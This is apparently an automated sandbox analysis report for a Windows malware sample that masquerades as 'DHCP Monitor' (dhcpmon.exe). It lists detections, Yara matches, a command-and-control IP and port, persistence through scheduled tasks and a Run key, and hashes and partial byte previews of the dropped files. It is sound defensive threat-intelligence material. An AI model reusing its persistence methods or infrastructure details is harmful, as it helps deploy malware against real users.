        Source: Yara matchFile source: 14.2.dhcpmon.exe.38d3258.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.RHK098760045678009000.exe.f040000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.RHK098760045678009000.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.24a0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RHK098760045678009000.exe.f041458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.3823258.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.38a16b4.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.4c4428.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.2490000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.f050000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.722890.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.38d3258.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.39516b4.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.dhcpmon.exe.f050000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.RHK098760045678009000.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.313620230.0000000000715000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.314060593.00000000024F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327748596.00000000049A2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306384984.00000000025F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306683045.0000000003A31000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327148918.00000000004B5000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.305718280.0000000000615000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327594984.0000000003821000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RHK098760045678009000.exe PID: 1744, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RHK098760045678009000.exe PID: 5820, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RHK098760045678009000.exe PID: 2184, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 2724, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6216, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6692, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6812, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management Instrumentation1Scheduled Task/Job1Process Injection112Disable or Modify Tools1Input Capture11System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
        Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information11LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerSystem Information Discovery15SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing31NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading2LSA SecretsSecurity Software Discovery13SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 510055 Sample: RHK098760045678009000.exe Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 11 other signatures 2->69 8 RHK098760045678009000.exe 17 2->8         started        12 RHK098760045678009000.exe 16 2->12         started        14 dhcpmon.exe 16 2->14         started        16 dhcpmon.exe 16 2->16         started        process3 dnsIp4 51 C:\Users\user\AppData\Local\...\fbnwl.dll, PE32 8->51 dropped 73 Detected unpacking (changes PE section rights) 8->73 75 Detected unpacking (overwrites its own PE header) 8->75 77 Uses schtasks.exe or at.exe to add and modify task schedules 8->77 19 RHK098760045678009000.exe 1 18 8->19         started        53 C:\Users\user\AppData\Local\...\fbnwl.dll, PE32 12->53 dropped 79 Injects a PE file into a foreign processes 12->79 24 RHK098760045678009000.exe 3 12->24         started        55 C:\Users\user\AppData\Local\...\fbnwl.dll, PE32 14->55 dropped 26 dhcpmon.exe 2 14->26         started        59 192.168.2.1 unknown unknown 16->59 57 C:\Users\user\AppData\Local\...\fbnwl.dll, PE32 16->57 dropped file5 signatures6 process7 dnsIp8 61 185.222.57.90, 4445, 49748, 49749 ROOTLAYERNETNL Netherlands 19->61 41 C:\Program Files (x86)\...\dhcpmon.exe, PE32 19->41 dropped 43 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 19->43 dropped 45 C:\Users\user\AppData\Local\...\tmpBEAC.tmp, XML 19->45 dropped 47 C:\...\dhcpmon.exe:Zone.Identifier, ASCII 19->47 dropped 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->71 28 schtasks.exe 1 19->28         started        30 schtasks.exe 1 19->30         started        49 C:\Users\...\RHK098760045678009000.exe.log, ASCII 24->49 dropped file9 signatures10 process11 process12 32 dhcpmon.exe 3 28->32         started        35 conhost.exe 28->35         started        37 conhost.exe 30->37         started        file13 39 C:\Users\user\AppData\...\dhcpmon.exe.log, ASCII 32->39 dropped

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        RHK098760045678009000.exe29%VirustotalBrowse
        RHK098760045678009000.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%Joe Sandbox ML
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe30%ReversingLabsWin32.Backdoor.Androm

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        23.0.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        14.2.dhcpmon.exe.24f0000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        8.2.RHK098760045678009000.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        12.2.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        14.2.dhcpmon.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        23.2.dhcpmon.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        21.2.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        14.0.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        0.0.RHK098760045678009000.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        14.1.dhcpmon.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        0.2.RHK098760045678009000.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        12.0.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        11.1.RHK098760045678009000.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        8.0.RHK098760045678009000.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        23.1.dhcpmon.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        11.0.RHK098760045678009000.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        1.0.RHK098760045678009000.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        21.0.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        11.2.RHK098760045678009000.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        11.2.RHK098760045678009000.exe.25f0000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        23.2.dhcpmon.exe.49a0000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        0%Avira URL Cloudsafe
        185.222.57.900%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        true
        • Avira URL Cloud: safe
        		low
        185.222.57.90true
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nsis.sf.net/NSIS_ErrorRHK098760045678009000.exefalse
          		high
          http://nsis.sf.net/NSIS_ErrorErrorRHK098760045678009000.exefalse
            		high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            185.222.57.90
            		unknownNetherlands
            		51447ROOTLAYERNETNLtrue

            Private

            IP
            192.168.2.1

            General Information

            Joe Sandbox Version:33.0.0 White Diamond
            Analysis ID:510055
            Start date:27.10.2021
            Start time:12:34:11
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 11m 58s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:RHK098760045678009000.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:36
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@18/19@0/2
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 74.3% (good quality ratio 66.9%)
            • Quality average: 73.9%
            • Quality standard deviation: 33.3%
            HCA Information:
            • Successful, ratio: 83%
            • Number of executed functions: 264
            • Number of non-executed functions: 175
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            Show All
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
            • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.50.102.62, 13.107.4.50, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.210.154
            • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, b1ns.c-0001.c-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, b1ns.au-msedge.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            12:35:20Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\Desktop\RHK098760045678009000.exe" s>$(Arg0)
            12:35:21API Interceptor916x Sleep call for process: RHK098760045678009000.exe modified
            12:35:23Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
            12:35:23AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            185.222.57.90FHKPO098765432345.exeGet hashmaliciousBrowse

              Domains

              No context

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              ROOTLAYERNETNLFHKPO098765432345.exeGet hashmaliciousBrowse
              • 185.222.57.90
              SecuriteInfo.com.Suspicious.Win32.Save.a.4240.exeGet hashmaliciousBrowse
              • 185.222.58.151
              SecuriteInfo.com.Artemis3008D0721A6C.1070.exeGet hashmaliciousBrowse
              • 185.222.58.151
              AWB #3099657260.xlsxGet hashmaliciousBrowse
              • 185.222.57.190
              HIC INTERNATIONAL - REQUEST FOR QUOTATION DOCUMENTS.exeGet hashmaliciousBrowse
              • 45.137.22.70
              AWB #30996572600.xlsxGet hashmaliciousBrowse
              • 185.222.57.190
              BL. NO. ANSMUNDAR3621.exeGet hashmaliciousBrowse
              • 185.222.57.71
              Payment Supplier.xlsxGet hashmaliciousBrowse
              • 185.222.57.85
              BULK ORDER #RFQ REF R2100131410.exeGet hashmaliciousBrowse
              • 45.137.22.70
              Proforma Invoices.exeGet hashmaliciousBrowse
              • 45.137.22.77
              TT copy.exeGet hashmaliciousBrowse
              • 185.222.57.71
              EXT-Order-ES.xlsxGet hashmaliciousBrowse
              • 185.222.57.190
              attached MT103.xlsxGet hashmaliciousBrowse
              • 185.222.57.85
              invoice.exeGet hashmaliciousBrowse
              • 185.222.57.71
              pHfIio3D4E.exeGet hashmaliciousBrowse
              • 45.137.22.77
              Kyodo International Corp - Products Lists.exeGet hashmaliciousBrowse
              • 185.222.57.253
              tgSQwVSEzE.exeGet hashmaliciousBrowse
              • 45.137.22.77
              Keen-Pros-DOC310521-31052021124021.exeGet hashmaliciousBrowse
              • 45.137.22.70
              Order EQE090.xlsxGet hashmaliciousBrowse
              • 185.222.57.190
              PO-10152021.exeGet hashmaliciousBrowse
              • 185.222.58.151

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Process:C:\Users\user\Desktop\RHK098760045678009000.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Category:dropped
              Size (bytes):446374
              Entropy (8bit):7.37562465733928
              Encrypted:false
              SSDEEP:6144:vBlL/qJ0hAJgtOHh6K6wiqyv/9nWZbcqzr2VURH2W1yS1dk3kqA/eFaTQH:J+0hAgtOHEK61B/9yn662WwS1dkdAfTo
              MD5:8AE8A20159A1FDEDD8C4937E8CC4C571
              SHA1:A68C405AA1BEC64C9790C321B4785C98F5C9A2A6
              SHA-256:BD386B60F5A095F369D4473D5F3185C226363A563F45326CEA048E10F0FF403B
              SHA-512:AE7EC190DB374595C4612F937F8FF98172B4A9C828E218806498E6443C0490CFDF92FE7A8F2B965DC34015C5B5E004DD02C53289A55C94E194F079B0E8017261
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 30%
              Reputation:low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t...........;...........................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc....;.......<...x..............@..@................................................................................................................................................................................................................................................................................................................................................................
              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier
              Process:C:\Users\user\Desktop\RHK098760045678009000.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Reputation:high, very likely benign file
              Preview: [ZoneTransfer]....ZoneId=0
              C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RHK098760045678009000.exe.log
              Process:C:\Users\user\Desktop\RHK098760045678009000.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):525
              Entropy (8bit):5.2874233355119316
              Encrypted:false
              SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
              MD5:61CCF53571C9ABA6511D696CB0D32E45
              SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
              SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
              SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
              Malicious:true
              Reputation:high, very likely benign file
              Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
              C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):525
              Entropy (8bit):5.2874233355119316
              Encrypted:false
              SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
              MD5:61CCF53571C9ABA6511D696CB0D32E45
              SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
              SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
              SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
              Malicious:true
              Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
              C:\Users\user\AppData\Local\Temp\9re2jblvico
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:data
              Category:dropped
              Size (bytes):279039
              Entropy (8bit):7.9862471646957305
              Encrypted:false
              SSDEEP:6144:05TTwU+xMf7+UF1tCr0XpS6i/qpwSu47UNIp9U7iWwK:+TyxMD+UF/CEpTsYwSu2QItK
              MD5:EF5501D8A05A00E32A4DA2E879054CAB
              SHA1:EE96AF9CAA8A0B968D5664A61CAEF4A18C7F097F
              SHA-256:60C2C9E683635BC40FCBC61E06A25532D00E6BA4D46624C7C57E71580AE84DCF
              SHA-512:D636286954326E505FC524A21B8D1540AD1F66A84C513B87BA9027D12C4A3EF74F14D0707AE5E88F8432DBCE3A7ABB98D61DEFA7B740E4CF3342C0463874E8F9
              Malicious:false
              Preview: 9c..\)..... .".\a2).H<....i>..z..T%.b...=i.q..).k.....Am..[c.Z.%...p[$W.n.a-..../E....|8.p..vY..1........)Z.,-u/....j.....{.@....:...U.A..L.%...B....../"u.#..p.. ..]/n!.....~...W...du.X..!Jh}.....q$..x..v..0.|..ed...~,:.r......8"j......V.....5....)..... k.7\.t[.H<..c.i>..p.4..b:..=..q..).;...6Am.`[c.#.l...p......x.[fZ.=h...x..Ea...A..}...a!..%x....L..PK,....\.{..|...o^..........|O.+E$..jx..HV...P..Pd.2.I#.!:.[....J{..~T..v.F.k.*..K...../bk.).!O...X8...U.T]lxr.i.......b....p..V.....v,.ZL).... I..\`.).H...c.i>..z..T%......Y.)h.).....\Am..[c.AZ.lA..pX....K..[nd..R_..x^.&a...A..}...H...:x....L...^.,...A3.{.w|....5..5..C.6..8.O...$..jx.H...*...P..c.I..!Y..m'.J{..~T..v.F.k.*.|.K..........!O...X8...UwT]w3r.i.......b....p..V.....5....)..'.. I1.\`2).H<..c.i>..z..T%.b...=i.q..).k.....Am..[c.Z.lA..pX....K.x.[f..]h...x..&a...A..}...a...:x....L...P.,......{..|...o^.....C....8.O...$..jx..HV...P..Pd.2.I#.!Y...m..J{..~T..v.F.k.*..K..........!O...X8...UwT]w3r.
              C:\Users\user\AppData\Local\Temp\nsf6352.tmp\fbnwl.dll
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
              Category:modified
              Size (bytes):22016
              Entropy (8bit):6.644684115150565
              Encrypted:false
              SSDEEP:384:4sowZo58r1ZAbGTBDPHglPB51T7nkxop4D+Znha2+K5wUcatJsIfX:Cwu58r1oGTBGPK6pq+p42+ZCtJsA
              MD5:1288423DC0799D420E65125515BA8198
              SHA1:F1CB23453DFEFED3BD256EBD8FE9C1FCE230E901
              SHA-256:BE749029D5FFBA43EBCD1BE38E8486BA88FD77A39B08266CFE79C9FA21CF3466
              SHA-512:60B548402CC56A944EAF8BBE0186F02633BED0F267154BEA5844273C13F4B122D2EA7D8980B288AA0D272A742D49107E6DE558B26BDD98583F787AC7D1895BAC
              Malicious:false
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ T._A:._A:._A:.....^A:..^>.]A:..]4.^A:..^0.[A:.K*;.JA:._A;..A:...>.^A:...:.^A:.....^A:...8.^A:.Rich_A:.........PE..L.....ya...........!.....&...,...............@............................................@..........................A..L...xC.......p...............................A...............................................@..p............................text..."$.......&.................. ..`.rdata.......@.......*..............@..@.data........P.......6..............@....rsrc........p.......P..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\nsr3472.tmp\fbnwl.dll
              Process:C:\Users\user\Desktop\RHK098760045678009000.exe
              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
              Category:modified
              Size (bytes):22016
              Entropy (8bit):6.644684115150565
              Encrypted:false
              SSDEEP:384:4sowZo58r1ZAbGTBDPHglPB51T7nkxop4D+Znha2+K5wUcatJsIfX:Cwu58r1oGTBGPK6pq+p42+ZCtJsA
              MD5:1288423DC0799D420E65125515BA8198
              SHA1:F1CB23453DFEFED3BD256EBD8FE9C1FCE230E901
              SHA-256:BE749029D5FFBA43EBCD1BE38E8486BA88FD77A39B08266CFE79C9FA21CF3466
              SHA-512:60B548402CC56A944EAF8BBE0186F02633BED0F267154BEA5844273C13F4B122D2EA7D8980B288AA0D272A742D49107E6DE558B26BDD98583F787AC7D1895BAC
              Malicious:false
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ T._A:._A:._A:.....^A:..^>.]A:..]4.^A:..^0.[A:.K*;.JA:._A;..A:...>.^A:...:.^A:.....^A:...8.^A:.Rich_A:.........PE..L.....ya...........!.....&...,...............@............................................@..........................A..L...xC.......p...............................A...............................................@..p............................text..."$.......&.................. ..`.rdata.......@.......*..............@..@.data........P.......6..............@....rsrc........p.......P..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\nsv5920.tmp\fbnwl.dll
              Process:C:\Users\user\Desktop\RHK098760045678009000.exe
              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
              Category:modified
              Size (bytes):22016
              Entropy (8bit):6.644684115150565
